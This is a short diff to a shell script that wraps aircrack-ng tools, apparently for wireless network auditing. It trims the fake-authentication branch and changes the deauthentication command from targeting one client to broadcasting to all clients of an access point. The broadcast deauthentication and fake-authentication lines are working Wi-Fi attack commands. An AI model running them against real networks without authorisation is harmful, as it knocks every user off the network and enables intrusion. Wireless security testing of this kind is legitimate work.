@@ -81,22 +81,15 @@ if [ "$1" == 'capture' ]; then
 fi 
 
 if [ "$1" == 'authenticate' ]; then
-
-    ## 1. Spaces should be handled in the main program 
     aireplay-ng -1 5 -q 10 -a $2 -h $3 -e $4 wlan0
-    
-    ## 2. Workaround version for handling spaces
-    # if    [ "$#" == '4' ]; then
-        # aireplay-ng -1 5 -q 10 -a $2 -h $3 -e $4 wlan0
-    # elif  [ "$#" == '5' ]; then
-        # aireplay-ng -1 5 -q 10 -a $2 -h $3 -e "$4 $5" wlan0
-    # elif  [ "$#" == '6' ]; then
-        # aireplay-ng -1 5 -q 10 -a $2 -h $3 -e "$4 $5 $6" wlan0
-    # fi   
 fi 
 
 if [ "$1" == 'deauthenticate' ]; then 
-    aireplay-ng -0 5 -a $2 -c $3 wlan0
+    ##1. direct/targeted 
+    # aireplay-ng -0 5 -a $2 -c $3 wlan0
+    
+    ##2. broadcast
+    aireplay-ng -0 5 -a $2 wlan0
 fi 
 
 if [ "$1" == 'injection' ]; then 
